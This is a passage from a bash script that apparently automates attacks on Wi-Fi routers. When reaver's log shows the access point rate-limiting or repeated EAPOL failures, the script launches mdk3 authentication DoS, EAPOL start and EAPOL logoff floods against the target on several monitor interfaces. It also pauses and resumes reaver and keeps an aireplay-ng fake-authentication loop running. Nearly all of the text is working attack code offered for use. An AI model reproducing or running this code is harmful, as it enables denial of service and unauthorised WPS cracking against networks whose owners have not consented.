MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
# Case 1: the last log line is the rate-limiting warning and no mdk3 process
# is listed. Open gnome-terminal windows running the selected mdk3 mode, one
# command per monitor interface, then refresh the snapshot.
while [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" = "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -a -z "$MDK3_KILLALL_1"  ]; do
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "mdk3 $MON3 a -a $MAC -s 200";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
sleep 0.5;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 0.5;
fi
MDK3_KILLALL_1=`ps -A|grep mdk3`
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`;
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
done
###
# Case 2: the failure warning is among the last four log lines and no mdk3
# process is listed. Suspend reaver with SIGSTOP, append a notice to the log,
# run the selected mdk3 mode under `timeout 60`, wait 60 seconds, then resume
# reaver with SIGCONT and refresh the snapshot.
while [ "$SUCCESSIVE_EAPOL_FAILURES" = "[!] WARNING: 25 successive start failures" -a -z "$MDK3_KILLALL_1" ]; do
killall -STOP reaver
echo -e "\e[36m\e[1mReaver detected 25 successive eapol failures!, pausing reaver and running flood attacks for 60 second!\e[0m" >> /etc/reaver_tmp.txt ;
if [ "$MDK3_MAIN_MENU_OPTION" = 1 ]; then
gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "timeout 60 mdk3 $MON1 a -a $MAC -s 200" & gnome-terminal --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e  "timeout 60 mdk3 $MON2 a -a $MAC -s 200" & gnome-terminal -e --geometry=1x2 --title='Authentication Dos Flood Attack in progess' -e "timeout 60 mdk3 $MON3 a -a $MAC -s 200";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 2 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e " timeout 60 mdk3 $MON2 x 0 -t $MAC -n "$ESSID" -s 200" &  gnome-terminal  --geometry=1x2 --title='EAPOL Start Flood Attack in progress' -e "timeout 60 mdk3 $MON3 x 0 -t $MAC -n "$ESSID" -s 200";
sleep 60;
fi
if [ "$MDK3_MAIN_MENU_OPTION" = 3 ]; then
gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON1 x 1 -t $MAC  -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e "timeout 60 mdk3 $MON2 x 1 -t $MAC -s 200 -c $TARGET_STATION" & gnome-terminal  --geometry=1x2 --title='EAPOL log off Flood Attack in progress' -e  "timeout 60 mdk3 $MON3 x 1 -t $MAC -s 200 -c $TARGET_STATION";
sleep 60;
fi
killall -CONT reaver;
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
MDK3_KILLALL_1=`ps -A|grep mdk3`
done
###
# Stop condition: kill every mdk3 process as soon as the last log line is no
# longer the rate-limiting warning, or the failure warning is present.
VARIABLE_CHECK_FOR_RATE_LIMITING=`tail -1 /etc/reaver_tmp.txt 2> /dev/null`
SUCCESSIVE_EAPOL_FAILURES=`tail -4 /etc/reaver_tmp.txt 2> /dev/null|grep -F '[!] WARNING: 25 successive start failures'`;
if [ "$VARIABLE_CHECK_FOR_RATE_LIMITING" != "[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking" -o "$SUCCESSIVE_EAPOL_FAILURES" =  "[!] WARNING: 25 successive start failures" ]; then
killall mdk3 2> /dev/null
fi
done
}
###########################################################################
# Foreground display worker. Alternates forever between following reaver's log
# for 10 seconds and aireplay-ng's log for 5 seconds. Between the two views it
# kills every aireplay-ng process if the aireplay log contains
# "Switching to shared key authentication"; the AIREPLAY worker's loop then
# starts a fresh session.
TAIL() {
  while true; do
    clear
    timeout 10 tail -n 100 -f /etc/reaver_tmp.txt 2> /dev/null
    clear
    AIREPLAY_RESET=$(cat '/etc/aireplay_tmp.txt' | grep -w 'Switching to shared key authentication')
    [[ -n "$AIREPLAY_RESET" ]] && killall aireplay-ng
    timeout 5 tail -n 100 -f /etc/aireplay_tmp.txt 2> /dev/null
  done
}
###########################################################################
# Worker: keeps an aireplay-ng -1 session against the target BSSID/ESSID
# running on MON1. Whenever the command exits (for example after TAIL kills
# it), the loop waits half a second and starts it again. Each start overwrites
# /etc/aireplay_tmp.txt because tee is used without -a.
AIREPLAY() {
  while true; do
    sleep 0.5
    aireplay-ng $MON1 -1 100000000 -a "$MAC" -e "$ESSID" -Q -q3 2> /dev/null \
      | tee /etc/aireplay_tmp.txt > /dev/null
  done
}
  438. ###########################################################################
  439. MDK3_MAIN_MENU